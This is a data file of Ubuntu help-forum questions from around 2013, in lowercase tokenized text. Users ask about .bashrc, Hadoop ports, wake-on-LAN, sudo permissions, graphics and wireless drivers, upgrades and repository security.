352866	why default .bashrc is set to return immediately if not running interactively ?	in ubuntu default .bashrc there 's this : # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return does anyone know why that is there ? is there something in the bashrc that is bad to run if the shell is ran non-interactively ?
352868	i ca n't connect to hadoop port 9000	so telnet actually is working , i mean telnet localhost 25 is connecting ; but telnet localhost or telnet localhost 9000 got such result : trying 127.0.0.1 ... telnet : unable to connect to remote host : connection refused nmap results : $ nmap localhost starting nmap 6.00 ( http : //nmap.org ) at 2013-10-03 00:54 msk nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.00030s latency ) . rdns record for 127.0.0.1 : localhost.localdomain not shown : 992 closed ports port state service 22/tcp open ssh 25/tcp open smtp 80/tcp open http 587/tcp open submission 631/tcp open ipp 3306/tcp open mysql 5432/tcp open postgresql 6566/tcp open sane-port nmap on 9000 port : $ nmap -p 9000 localhost starting nmap 6.00 ( http : //nmap.org ) at 2013-10-03 00:55 msk nmap scan report for localhost ( 127.0.0.1 ) host is up ( 0.000040s latency ) . rdns record for 127.0.0.1 : localhost.localdomain port state service 9000/tcp closed cslistener so the question is how to open necessary port , im using ubuntu 13.04 ; tried to disable ufw , tried to play with iptables ; nothing helped . dunno even what to do ... i need 9000 port for hadoop ; i cant access fs without opened 9000 port
352872	why 's this shutdown one-liner command not working	it works fine from terminal , but when called from a thread in python , it fails . history -d $ ( ( histcmd-1 ) ) & & echo 'password ' | sudo -s shutdown -h 08:00 from python , here 's what i did : halt = `` history -d $ ( ( histcmd-1 ) ) & & echo 'password ' | sudo -s shutdown -h 08:00 '' thread.start_new_thread ( lambda : commands.getoutput ( halt ) , ( ) ) i used lambda after trying it for other commands like opening nautilus or gedit , which works fine , but shutdown command is n't !
352875	how can i enable all installed gnome shell extensions ?	i need this , because sometimes the gnome shell `` forgot '' all my extensions configurations after a normal reboot/shutdown . and i'do n't want reinstall entire system because this . so i want a script or a command to enable then all during the my session startup ( putting in gnome-session-properties ) or even a fix for this problem . i 'm using ubuntu gnome 13.04 on gnome shell 3.8.3 ( downgrade , now on v3.6.3.1 ) output of find ~/ \ ! -user $ user -print : /home/mediacenter/.cache/dconf find : `/home/mediacenter/.cache/dconf ' : permission denied /home/mediacenter/.gvfs find : `/home/mediacenter/.gvfs ' : permission denied
352888	wake-on-lan 13.04 problems	i 've been trying to get wol to work for weeks on my ubuntu server 13.04 install but it just does n't seem to work . i notice when i suspend the server with `` sudo pm-suspend '' or via the desktop gui , the nic card turns off . i.e. , there is no blinking lights on the network port . i do n't know if that 's the issue but in my /var/log/syslog , i also saw that my ethernet was not one of the pcis that had `` system wakeup enabled by acpi '' : oct 2 16:46:10 jamfs1 kernel : [ 26462.745615 ] pm : suspend of devices complete after 519.955 msecs oct 2 16:46:10 jamfs1 kernel : [ 26462.745743 ] pm : late suspend of devices complete after 0.126 msecs oct 2 16:46:10 jamfs1 kernel : [ 26462.745953 ] ehci-pci 0000:00:1d.0 : system wakeup enabled by acpi oct 2 16:46:10 jamfs1 kernel : [ 26462.761576 ] ehci-pci 0000:00:1a.0 : system wakeup enabled by acpi oct 2 16:46:10 jamfs1 kernel : [ 26462.793491 ] xhci_hcd 0000:00:14.0 : system wakeup enabled by acpi oct 2 16:46:10 jamfs1 kernel : [ 26462.809491 ] pm : noirq suspend of devices complete after 63.784 msecs oct 2 16:46:10 jamfs1 kernel : [ 26462.809695 ] acpi : preparing to enter system sleep state s3 ... ... . oct 2 16:46:10 jamfs1 kernel : [ 26463.464575 ] acpi : waking up from system sleep state s3 oct 2 16:46:10 jamfs1 kernel : [ 26463.510511 ] xhci_hcd 0000:00:14.0 : system wakeup disabled by acpi oct 2 16:46:10 jamfs1 kernel : [ 26463.542498 ] ehci-pci 0000:00:1a.0 : system wakeup disabled by acpi oct 2 16:46:10 jamfs1 kernel : [ 26463.574474 ] ehci-pci 0000:00:1d.0 : system wakeup disabled by acpi oct 2 16:46:10 jamfs1 kernel : [ 26463.590562 ] pm : noirq resume of devices complete after 125.527 msecs oct 2 16:46:10 jamfs1 kernel : [ 26463.590650 ] pm : early resume of devices complete after 0.071 msecs but according to `` cat /proc/acpi/wakeup '' my ethernet card is supposed be to enabled : device s-state status sysfs node usb1 s3 *disabled rp01 s4 *enabled pci:0000:00:1c.0 rp03 s4 *enabled pci:0000:00:1c.2 glan s4 *disabled ehc1 s4 *enabled pci:0000:00:1d.0 ehc2 s4 *enabled pci:0000:00:1a.0 xhc s4 *enabled pci:0000:00:14.0 hdef s4 *enabled pci:0000:00:1b.0 peg0 s4 *disabled pegp s4 *disabled from my `` lspci -tv '' , you can see that `` pci:0000:00:1c.2 '' is the atheros ethernet card : +-14.0 intel corporation lynx point usb xhci host controller +-16.0 intel corporation lynx point mei controller # 1 +-1a.0 intel corporation lynx point usb enhanced host controller # 2 +-1b.0 intel corporation lynx point high definition audio controller +-1c.0- [ 01 ] -- +-1c.2- [ 02 ] -- -- 00.0 qualcomm atheros qca8171 gigabit ethernet +-1d.0 intel corporation lynx point usb enhanced host controller # 1 +-1f.0 intel corporation lynx point lpc controller i also set /sys/class/net/p2p1/device/power/wakeup to 'enabled ' . as well as ran sudo ethtool -s p2p1 wol g and inserted that into my /etc/rc.local i have enabled the equivalent wake on lan/pci in my asrock bios . ethtool p2p1 ( p2p1 is my qualcomm atheros qca8171 gigabit ethernet name ) shows this : supports wake-on : pg wake-on : g so what do i do ? ? i followed every guide and suggestion i found . do you think it 's a driver issue ? is there a way to update the atheros driver ? has anyone been able to wake on lan if the nic card has no blinking lights ? with the system up , i used wireshark and was able to detect the wol packets sent from my local dd-wrt via the command /usr/sbin/wol -i 192.168.1.254 -v bc:5f : f4 : be:38 : e4 -p 9 . i also was able to receive the packets from a windows machine with a wol generator . anyone has any suggestions as i 'm just out of ideas ... . thanks in advance for reading . lastly , my lspci -vv is as such if that helps anyone : 02:00.0 ethernet controller : qualcomm atheros qca8171 gigabit ethernet ( rev 10 ) subsystem : asrock incorporation device 10a1 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx+ latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 18 region 0 : memory at f0400000 ( 64-bit , non-prefetchable ) [ size=256k ] region 2 : i/o ports at e000 [ size=128 ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1- d2- auxcurrent=375ma pme ( d0+ , d1+ , d2+ , d3hot+ , d3cold+ ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=0 pme- capabilities : [ 58 ] express ( v1 ) endpoint , msi 00 devcap : maxpayload 4096 bytes , phantfunc 0 , latency l0s unlimited , l1 unlimited exttag- attnbtn+ attnind+ pwrind+ rbe+ flreset- devctl : report errors : correctable+ non-fatal+ fatal+ unsupported+ rlxdord- exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr+ fatalerr- unsuppreq+ auxpwr+ transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l0s l1 , latency l0 unlimited , l1 unlimited clockpm+ surprise- llactrep- bwnot- lnkctl : aspm disabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- capabilities : [ c0 ] msi : enable- count=1/16 maskable+ 64bit+ address : 0000000000000000 data : 0000 masking : 00000000 pending : 00000000 capabilities : [ d8 ] msi-x : enable+ count=16 masked- vector table : bar=0 offset=00002000 pba : bar=0 offset=00003000 capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq+ acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp- sdes+ tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr- cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 14 , gencap+ cgenen- chkcap+ chken- capabilities : [ 180 v1 ] device serial number ff-be-38-f4-bc-ef-f4-df kernel driver in use : alx
352889	why am i being denied my rights in sudo ?	why am i being denid my rights to delete directories even i created in sudo now i can not rid myself of it -- yes it is empty did this to insure i have sudo in the accounts : userz @ bw : ~ $ sudo adduser userx sudo [ sudo ] password for userz : the user `userx ' is already a member of `sudo ' . userz @ bw : ~ $ sudo adduser userz sudo the user `userz ' is already a member of `sudo ' . userz @ bw : ~ $ cd /usr/local/share so then i tried to delete the directory : userz @ bw : /usr/local/share $ rmdir themes rmdir : failed to remove âthemesâ : permission denied checked to be sure it is empty : userz @ bw : /usr/local/share $ cd themes userz @ bw : /usr/local/share/themes $ ls userz @ bw : /usr/local/share/themes $ ls -la total 8 drwxr-xr-x 2 root root 4096 oct 2 14:20 . drwxr-xr-x 8 root root 4096 oct 2 14:20 .. userz @ bw : /usr/local/share/themes $ if i am in sudo then why it not let me be super user dude to do what i will ?
352891	what are the specs needed to run ubuntu 13.04 ?	i am thinking of putting ubuntu 13.04 onto some machines . they are three years old and i ca n't find anywhere some hardware specs that these machines should meet . please let me know ! thanks in advance
352898	error : driver 'pcspkr ' is already registered , aborting	i had trouble opening the software centre in 12.04 . i tried the troubleshooting given here . after carrying out the instructions , i rebooted my computer only to find that i ca n't reach the login screen . instead i get this error : error : driver 'pcspkr ' is already registered , aborting can someone please guide me through this ?
352901	how can i install adobe flash player 11.tar.gz file on ubuntu 13.04	i 'm a new user of linux and intalled ubuntu 13.04 and i do n't know how to install tar.gz file there . i want to install adobe flash player to play videos on firefox browser . please give me solution
352913	multiple monitors switch around when my xorg.conf is used	when in twinview the system makes my primary display my benq 24 '' and my samsung 32 '' tv the second screen , great ! trouble is : when i make a basic xorg.conf using nvidia-settings i reboot and it gets them backwards , the image that ubuntu thinks is the benq primary ( according to what all settings > displays & nvidia-settings both say ) is actually showing on the tv , and the benq is showing a big grey screen , but the cursor works . http : //pastebin.com/amitzrqg one final complication is that my tv runs through my amp in order to get digital sound , it shows in ubuntu as 'onkyo blah.. ' . my monitor is using the displayport of my geforce gtx 670 while the tv is on hdmi , this may be what 's making the tv primary ( as it carries the sound ) . if i make another conf which disables the tv it reverts back to twinview on reboot , here 's the conf for that if its worth while : http : //pastebin.com/xiqmy29n help !
352915	how to run 32 bits programs on ubuntu 64 bits ( 12.04 )	i know that there are already some posts about this topic , but i could n't solve my problem ... i already tried to run sudo apt-get install ia32-libs on the console , but it could n't find the repositories . i also googled it and tried to run sudo dpkg -- add-architecture i386 , but it said dpkg : error : unknown option -- add-architecture . does anyone knows how to solve this please ? i need both 32 and 64 bits programs for the university
352916	ubuntu startup disk/usb problem	here is the problem . i burned a ubuntu installation disk and ubuntu usb . i used ubuntu 12.04 amd64 . my computer is 64bit . here is what happens : when computer starts , it boots from the usb properly . displays the menu , but when i click either install or just run ubuntu without installation i face black screen and nothing happens . the same happens when i boot from ubuntu disk . i tried reinstalling usb , nothing changed . any help is highly appreciated . i really want to escape windows 8 . thank you
352920	fastest way to convert videos ( batch or single ) ?	i know there are a lot of questions about video encoders around here , but my question is more about workflow/efficiency . for my day job , i need to convert videos , frequently , from many random formats ( usually large avi , m4v , and what not ) and convert them and compress them down into efficient files we can use around the internet for uploading . formats i must produce are : wmv ( windows media 9 ) mov ( h264 ) mp4 ( h264 ) i need to create common templates for a couple use cases ( convert to same-as-source , 1080p , or 720p ) and be able to process these quickly , and en queue . any ideas on how to best go about this process in ubuntu ?
352927	hp650 atheros ar9485 card doesnt work	a week ago i bought hp650 . there was a preinstalled opensuse11 . i decided to install ubuntu 12.04 . everything works well except the wireless and bluetooth . the wireless works on suse . ubuntu finds the wireless card , but it does not appear to be turned on . the only physical means of turning on the card is the fn-f12 key combo . i 've looked in the forums for a solution and i 'm not quite sure what to do . by clicking fn-f12 key combo changes : juraj @ juraj-hp-650-notebook-pc : ~ $ rfkill list all 0 : hp-wifi : wireless lan soft blocked : yes hard blocked : yes 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : yes 2 : phy0 : wireless lan soft blocked : yes hard blocked : yes juraj @ juraj-hp-650-notebook-pc : ~ $ rfkill list all 0 : hp-wifi : wireless lan soft blocked : yes hard blocked : no 1 : hp-bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : yes hard blocked : yes but the wireless is n't working juraj @ juraj-hp-650-notebook-pc : ~ $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off i tried to install backports but this happend : juraj @ juraj-hp-650-notebook-pc : ~ $ sudo apt-get install linux-backports-modules-cw-3.6-`uname -r` [ sudo ] password for juraj : čtu seznamy balíků… hotovo vytvářím strom závislostí čtu stavové informace… hotovo e : nelze najít balík linux-backports-modules-cw-3.6-3.8.0-31-generic e : nelze najít balík vyhovující regulárnímu výrazu „linux-backports-modules-cw-3.6-3.8.0-31-generic“ juraj @ juraj-hp-650-notebook-pc : ~ $ sudo apt-get install linux-backports-modules-wireless-maverick-generic [ sudo ] password for juraj : čtu seznamy balíků… hotovo vytvářím strom závislostí čtu stavové informace… hotovo e : nelze najít balík linux-backports-modules-wireless-maverick-generic i 've also tried to find the backports on the site http : //packages.ubuntu.com/source/precise/linux-backports-modules-3.2.0 and throught ubuntu software centre any help please ?
352932	issue with updating in ubuntu 12.04 running on flash drive	i am trying to update the packages on ubuntu 12.04 lts , which is running on a flash drive . i tried in the command : sudo apt-get update and receive the following error : w : duplicate sources.list entry cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) / precise/main i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.3 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20130820.1 ) _dists_precise_main_binary-i386_packages ) w : duplicate sources.list entry cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) / precise/restricted i386 packages ( /var/lib/apt/lists/ubuntu % 2012.04.3 % 20lts % 20 % 5fprecise % 20pangolin % 5f % 20- % 20release % 20amd64 % 20 ( 20130820.1 ) _dists_precise_restricted_binary-i386_packages ) ' how can i fix this problem so the system can update packages correctly ?
352934	make idle suspend try again if delayed by sleep.d scripts	i have my 12.04.3 box setup to suspend after 1/2 hour idle . i have a sleep.d script that will successfully inhibit pm-suspend if the box is downloading . the problem is that once it inhibits suspend once , it does n't try again after another 1/2 hour . i want it to keep trying every 1/2 hour until downloading is complete , then go to sleep . do i have to reset the xidle timer or something ? maybe there 's a different exit status for sleep.d scripts that will tell it to try again ? here 's a bit of /var/log/pm-suspend.log when it inhibits suspend like i want - then never tries again : running hook /etc/pm/sleep.d/05_sabnzbd_prevent_suspend suspend suspend : 1 in the sabnzbd queue . /etc/pm/sleep.d/05_sabnzbd_prevent_suspend suspend suspend : returned exit code 1 . tue oct 1 23:42:37 edt 2013 : inhibit found , will not perform suspend any ideas ? thanks !
352935	error while installing ubuntu 12.04.3 from usb drive . now harddrive is undetectable , how can this be fixed ?	the error occurred approximately 90 % through the installation bar while installing from liveusb and was not specified by any particular error code , just a popup suggesting harddrive troubles and sending an error report . attempting to run the ubuntu installer again ends when the only visible partition is the usb drive , the same occurs in gparted and when checking bios it states that a hard drive does not exist . edited to replace instances of 10.04.3 which i typed with 12.04.3 which i was actually installing edit 2 taking user142311 's advice i decided to format my usb drive and recreate my live usb instance of ubuntu 12.04.3 , this time the internal harddrive with my previous , failed ubuntu install was found and i was able to format and install ubuntu 12.04.3 on it . the new install is unfortunately not booting up currently but the hard drive is showing up once more in bios so the initial and worse of the two problems has been solved . thanks !
352937	ethernet speed is slowing down after some hours	hello ! i have ubuntu installed on my home server . server has 2 ethernet cards 1g each & one wi-fi card . one ethernet card ( eth0 ) & one wi-fi ( wlan0 ) are in bridge ( br0 ) and work in my inner network . the other ethernet card ( eth1 ) is connected to the internet via pppoe ( ppp1 ) . after some period of time my internet speed becomes very slow : from 20mbps to 4-5mbps . after resetting my eth1 card : root @ mice : ~ # poff root @ mice : ~ # ifconfig eth1 down root @ mice : ~ # ifconfig eth1 up root @ mice : ~ # pon provider after this the speed becomes 20mbps for next some hours . normal speed : http : //www.speedtest.net/result/3006350609.png slow speed : http : //www.speedtest.net/result/3006299553.png what can be the problem ? root @ mice : ~ # lshw -c network *-network description : wireless interface product : ar93xx wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 01 serial : cc : b2:55:00:61 : e7 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless logical configuration : broadcast=yes driver=ath9k driverversion=3.2.0-54-generic firmware=n/a latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:19 memory : f7400000-f741ffff memory : f7420000-f742ffff *-network description : ethernet interface product : dge-528t gigabit ethernet adapter vendor : d-link system inc physical id : 0 bus info : pci @ 0000:06:00.0 logical name : eth1 version : 10 serial : c8 : d3 : a3:83 : d6:20 size : 100mbit/s capacity : 1gbit/s width : 32 bits clock : 66mhz capabilities : pm bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=n/a ip=192.168.0.1 latency=64 link=yes maxlatency=64 mingnt=32 multicast=yes port=mii speed=100mbit/s resources : irq:16 ioport : d000 ( size=256 ) memory : f7321000-f73210ff memory : f7300000-f731ffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 06 serial : 54:04 : a6:94 : fa:3f size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:53 ioport : b000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff root @ mice : ~ # ethtool -i eth1 driver : r8169 version : 2.3lk-napi firmware-version : n/a bus-info : 0000:06:00.0 supports-statistics : yes supports-test : no supports-eeprom-access : no supports-register-dump : yes root @ mice : ~ # ethtool -i eth0 driver : r8169 version : 2.3lk-napi firmware-version : rtl_nic/rtl8168e-2.fw bus-info : 0000:08:00.0 supports-statistics : yes supports-test : no supports-eeprom-access : no supports-register-dump : yes root @ mice : ~ # ifconfig br0 link encap : ethernet hwaddr 54:04 : a6:94 : fa:3f inet addr:192.168.1.1 bcast:192.168.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:131967169 errors:0 dropped:211 overruns:0 frame:0 tx packets:63473281 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:10000 rx bytes:185459472130 ( 185.4 gb ) tx bytes:34104821610 ( 34.1 gb ) eth0 link encap : ethernet hwaddr 54:04 : a6:94 : fa:3f up broadcast running multicast mtu:9000 metric:1 rx packets:133960713 errors:0 dropped:0 overruns:0 frame:0 tx packets:56609422 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:10000 rx bytes:187446611584 ( 187.4 gb ) tx bytes:23974991524 ( 23.9 gb ) interrupt:53 base address:0x8000 eth1 link encap : ethernet hwaddr c8 : d3 : a3:83 : d6:20 inet addr:192.168.0.1 bcast:192.168.0.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:25960534 errors:0 dropped:0 overruns:0 frame:0 tx packets:13998750 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:10000 rx bytes:32984242119 ( 32.9 gb ) tx bytes:5697859955 ( 5.6 gb ) interrupt:16 base address:0x6000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:16436 metric:1 rx packets:604772 errors:0 dropped:0 overruns:0 frame:0 tx packets:604772 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:49406397 ( 49.4 mb ) tx bytes:49406397 ( 49.4 mb ) mon.wlan0 link encap : unspec hwaddr cc-b2-55-00-61-e7-00-00-00-00-00-00-00-00-00-00 up broadcast running multicast mtu:1500 metric:1 rx packets:2645146 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:441084358 ( 441.0 mb ) tx bytes:0 ( 0.0 b ) ppp1 link encap : point-to-point protocol inet addr:77.51.122.145 p-t-p:77.51.191.254 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:3452429 errors:0 dropped:0 overruns:0 frame:0 tx packets:2626751 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:3668772395 ( 3.6 gb ) tx bytes:1991838011 ( 1.9 gb ) wlan0 link encap : ethernet hwaddr cc : b2:55:00:61 : e7 up broadcast running multicast mtu:1500 metric:1 rx packets:2252253 errors:0 dropped:0 overruns:0 frame:0 tx packets:6878467 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:10000 rx bytes:130932879 ( 130.9 mb ) tx bytes:10268554923 ( 10.2 gb ) root @ mice : ~ # cat /etc/network/interfaces auto lo iface lo inet loopback auto domolink iface domolink inet ppp pre-up /sbin/ifconfig eth1 up provider domolink post-up /etc/cgi-bin/iptables.rules.sh post-up /sbin/ifconfig ppp1 txqueuelen 10000 auto eth1 iface eth1 inet static address 192.168.0.1 network 192.168.0.0 netmask 255.255.255.0 broadcast 192.168.0.255 auto br0 iface br0 inet static address 192.168.1.1 network 192.168.1.0 netmask 255.255.255.0 broadcast 192.168.1.255 bridge-ports eth0 wlan0 dns-nameservers 192.168.1.1 8.8.8.8 8.8.4.4 dns-search intranet post-up /etc/cgi-bin/post-up.sh root @ mice : ~ # cat /etc/cgi-bin/post-up.sh # ! /bin/sh /sbin/ethtool -s eth0 speed 1000 duplex full wol d /sbin/ethtool -s eth1 speed 100 duplex full wol d /sbin/ifconfig eth0 mtu 9000 /sbin/ifconfig eth0 txqueuelen 10000 /sbin/ifconfig eth1 txqueuelen 10000 /sbin/ifconfig wlan0 txqueuelen 10000 /sbin/ifconfig br0 txqueuelen 10000 echo 4096 > /proc/sys/net/netfilter/nf_conntrack_expect_max echo 2 > /proc/sys/net/ipv4/conf/all/arp_ignore echo 1 > /proc/sys/net/ipv4/conf/all/arp_announce echo 2048 > /proc/sys/net/ipv4/neigh/default/gc_thresh1 echo 8192 > /proc/sys/net/ipv4/neigh/default/gc_thresh2 echo 16384 > /proc/sys/net/ipv4/neigh/default/gc_thresh3 echo 300 > /proc/sys/net/ipv4/neigh/default/base_reachable_time service dnsmasq restart # service smbd restart service netatalk stop service netatalk start ip route add blackhole 192.168.0.0/16 ip route add blackhole 172.16.0.0/12 ip route add blackhole 10.0.0.0/8 route add -net 224.0.0.0/4 dev ppp1 exit 0 root @ mice : ~ # uname -a linux mice 3.2.0-54-generic # 82-ubuntu smp tue sep 10 20:08:42 utc 2013 x86_64 x86_64 x86_64 gnu/linux
352938	how to disable manual window resizing ?	how can i disable manual window resizing ( by grabbing the edge of the window or otherwise ) for one specific window ? ccsm seems to only have rules for setting window sizes , not this .
352943	pdf viewer copy and paste snapshots	i want to get a snapshot copy and paste from pdf viewer . but i couldnt do it . then i tried downlaod acrobat and got downlaoded file adberdr9.5.5-1_i486linux_enu.bin but i couldnt run it . please help
352948	my whole ubuntu os is really laggy	i just upgraded my computer from windows 7 to ubuntu 13.04 . the problem : it is extremely laggy . i ran it off my cdrom first to test the waters and it was laggy then too , but i assumed that was because i was running it from the cdrom . now it 's fully installed but everything is laggy except the pointer ( even typing ) .
352949	geany terminal window	i would like to know if there is a way we can display the `` terminal window '' permanently on the right side or in bottom in geany . i have tried checking all the menu items but couldnt find out how to actually do it . i am very new to ubuntu your guidance in this regard will be of great help .
352952	are repository lists secure ? is there an https version ?	are repository updates secure ? as a bear of little brain from the developer side , i can not understand why the repository list is http : //security.ubuntu.com and the other http ( unsecured ) sites listed in /etc/apt/sources.list . without a certificate chain match this appears as `` ask any responder for a list of packages to update '' instead of `` ask the ubuntu.com site ... '' can any network choose to spoof the update sites , and is this a common practice to provide a locally cached and vetted copy ?
352956	wiping my hard drive and dualbooting ubuntu 13	i 've searched far and wide , but still have n't found a way to do what i want ; i want to set up a gnu grub dualboot with windows 7 and ubuntu 13 . as of now , i am running a ; alienware m15x purchased september 14 2010 intel core i7 cpu q740 @ 1.73ghz 1.73ghz 6gb of ram 64-bit windows 7 ultimate service pack 1 ati mobility radeon hd 5800 series i want to wipe everything on my desktop other than files necessary for windows to still perform . i want no information left , other than windows 7 in a running state . after that , i 'll add ubuntu as a dual-boot using gnu grub . any recommendations ?
352957	switching workspaces with dual monitors	i 'm working on ubuntu 13.04 and have a second monitor connected with a vga . i currently have the second monitor as an extended screen . i was wondering if there was a way that i could set it up so i could put a window on my second monitor , switch workspaces on my main display and the second monitor display would n't change ? i think it was a thing in the past , but i have n't found a solution . i just want my second monitor to be consistent while my main workspace remains dynamic .
352958	update from 12.04 to 12.10 interrupted due to lack of space	i have decided to upgrade my ubuntu 12.04 to 12.10 . i had about 4.1gb space left on / . not until the last minute during the install phase did the upgrade manager ask me to make space on my drive . i started the software manager and now i ca n't get out of it back to continuing the upgrade . it keeps on asking me to repair the package catalog , and has no x bar or button to close it , nor can i alt-tab to the updater window . i am stuck half way through an upgrade and ca n't get out . i have been a fan of ubuntu for years but after today i fear i have lost confidence ... . please someone help .
352961	switching keyboard layouts using shortcuts but preserving gnome toolbar layout list	i 've often used a lot of keyboard layouts as i speak a few languages and typing on that language 's keyboard is generally easier than trying to recall the unicode codes for accents , but i 've run into a little problem . following instructions in posts like this one , i set up a custom shortcut to switch between three languages : english : ctrl + shift + 1 spanish : ctrl + shift + 2 nepali : ctrl + shift + 3 using the setxkbmap us , setxkbmap es , and setxkbmap np commands respectively . now the problem is as follows : even though this works it clears out all the keyboard layouts in the gnome toolbar so that the only one listed is the one i 've switched too . i 'm wondering how to prevent that from happening so that i can switch using either shortcut ( the normal switch keyboard shortcut or my custom ones ) or by clicking the gnome toolbar . if you ca n't prevent setxkbmap from removing all the shortcuts from the list is there another way to switch keyboard layouts using commands like setxkbmap ? i ca n't seem to find any information on this , and if it comes down to it i 'll have to forgo the quicker shortcuts in favor of stability with the existing ones . thanks to any help you all have to offer .
352964	install amd drivers ubuntu cause blank screen	installed ubuntu a few days ago . noticed straight away that the resolution was a lot lower than usual on windows and it could not be changed to any higher , so i managed to get around to installing some amd drivers from the official website ( expecting it to solve the problem ) . well it did solve that problem , however caused much more serious problems , when i start up the pc everything is perfect , the resolution , when i get to the login page everything is fine the top menu where the wifi and all is , is there and looking good . however when i log on all i see is that ubuntu purple'ish background and a cursor , basically a blank screen . luckily i managed to get the terminal up with the shorcut and start firefox ( how i am here now ) . i have been searching around for hours trying loads of different things in the terminal , i come across something to uninstall the graphics card drivers and i cant remember where that was or what the command was but it did uninstall it and i restarted , got back to the log on screen and the resolution was low again just like in the start , however i still end up with a blank screen after logging in . does anyone know what could cause this or how i can fix this serious issue ? i 'm not sure what information you would need but feel free to request .
352966	is it possible to copy ebooks from a kindle to my desktop ?	i have a kindle with many ebooks on it . i would like to back them up onto my desktop . i have a cable that will go from my kindle to usb , but i do n't know how to do this . thank you in advance for all of your help .
352967	software center seems opened correctly , but disappeared suddenly after a second or two	i am trying to access ubuntu software center to remove some app from my pc , but each time i tried to initiate ubuntu software center , it appeared on the screen for 2 seconds then it disappeared suddenly ... please assist it is necessary , thanks & regards ,
352970	sudo su setting default password automatique	i 'm a newbie linux ( ubuntu ) user and i have a question to sudo su , i always like use the root in the shell for no annoying privilgies errors : ) but the problem is sudo su always ask me for a password and this is also annoying to me , because i 'm on studying about linux so i open alots of shells and close them in short time : d for that i tried write this little bash script : # ! /bin/bash echo `` my_password '' | sudo su and make a symbolic link to it for executing it each time i open a shell , this is less annoying , because sudo always ask me for the password and sometimes i do some mistake in it : ) but the problem is the bash script does n't work : ( does anyone know how to this ? ? , or setting my password in sudo config file and it does n't ask me anymore for the password ? ? : ) thank you all
352975	error when opening ubuntu-tweak 8.5.1	i got this when i open ubuntu-tweak using terminal , anyone help me please.. gtk-error ** : gtkbox child gtktreeview minimum width : -1 < 0 for height 355 trace/breakpoint trap ( core dumped )
352977	how to fix graphics drivers on ubuntu 12.04 lts ? blank screen ( 13.8 catalyst ) beta 2	after installing the new amd catalyst fglrx beta driver for linux ( 13.8 ) , i could not boot up ubuntu 12.04 lts . i have dual boot , but all of my linux files are now missing . the only real thing i can access is grub , otherwise , normal boot just shows the little amd icon and a blank screen . i installed it using terminal , and then it asked me to reboot my laptop . i did , and it showed up with grub loader . after grub , i selected ubuntu , and it just showed `` for testing uses only '' . then it all dissappears , and i 'm left with a black screen that just lights up . the led for the hdd does n't even light up . i have no idea what to do . radeon 6620g / apu a8-3500m
